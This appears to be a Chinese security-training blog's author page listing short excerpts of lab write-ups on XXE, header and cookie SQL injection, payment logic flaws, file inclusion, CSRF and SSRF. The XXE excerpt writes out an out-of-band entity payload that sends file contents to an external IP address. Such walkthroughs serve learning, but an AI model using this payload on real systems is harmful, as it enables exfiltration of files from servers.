Track 实习学员

c7

0关注
0粉丝
21文章
返回网站首页

您已发布 21篇文章作品写文章

XXE实体注入

有自己服务器的请看http服务根目录下创建xxe目录1.首先把1.xml上传至xxe目录 文字版:<!ENTITY % all"<!ENTITY % send SYSTEM 'http://149.28.18.34/xxe/2.php?id=%file;'>"> %all; 图片版: 2.

 2019-5-18
 1 
 181 

HEAD注入-3

cookie注入输入zkz,zkz登录系统 第一个请求包(该请求用于查询数据库账号密码 ,使用户登录成功)第二个请求包(用户登录成功后的跳转,,用户客户端提交cookie)我们在1,2,3处进行测试1’发现在cookie处会产生sql报错由上可知,存在cookie注入 方法一:接着延时注入试下延时注入成功接下来大家就懂了 方法二:报错:【uname=zxc'o

 2019-5-18
 0 
 204 

HEAD注入1-2

Header注入Rank 1Header注入:    一般header注入,是对请求头里的参数,进行注入,为什么对header里的参数注入会有用呢,这是因为一些web网站,需要记录下用户或者某些请求的信息,所以会把这些信息写入数据库,当对这些写入的信息的sql语句没有做好安全防范工作,就会被攻击。  一进入网站,咦,发现和之前的不一样,没有提示我们

 2019-5-18
 0 
 322 

在线支付漏洞

支付漏洞 TIPS:    本题在该页面,当你的账户余额大于一定数额,就会显示flag。   思路:    注册一个会员账号并登录    然后在商品中心选中一件商品,点击立刻购买,抓包    把数量改

 2019-5-18
 0 
 61 

覆盖变量漏洞

思路:    设法进入管理员后台,获取管理员权限    后台管理员url: http://localhost/duomicms2/upload/admin/index.php如果未登陆,则会被跳转到:http://localhost/duomicms2/upload/admin/login.php    &n

 2019-5-18
 0 
 55 

本地包含与远程包含漏洞

本地包含与远程包含漏洞 1. 此漏洞代码审计本地环境搭建a)  访问:https://www.phpmyadmin.net/files/ 下b)  解压,放到本地phpstudy根目录下c)  修改php版本:d)  启用:e)  http://127.0.0.1/pm/ 我这里把文件夹重命名为pmf)  账户名/密码:root

 2019-5-18
 0 
 229 

CSRF跨站伪造请求

CSRF 跨站伪造请求 1.理解CSRF漏洞原理 2.渗透思路管理员成功登录网站后台,在管理员客户端处产生该网站的cookie,我们利用下面的两个链接构造poc,使管理员访问或者点击我们构造出来的链接,从而使的网站以为是管理员在执行操作。  3.根据漏洞代码构造链接(此文不讲代码审计)   {代码审计请看:Dedecms V5.

 2019-5-18
 0 
 334 

SSRF>漏洞和利用

SSRF漏洞和利用 Typecho SSRF漏洞分析与利用:https://www.secfree.com/article-535.html附:Burp response 返回中文乱:https://blog.csdn.net/M1mory/article/details/52944840思路:主要根据存在ssrf漏洞的url进行提交数据,根据返回的状态码和消息,进行判断端口是否开启,再

 2019-5-18
 1 
 130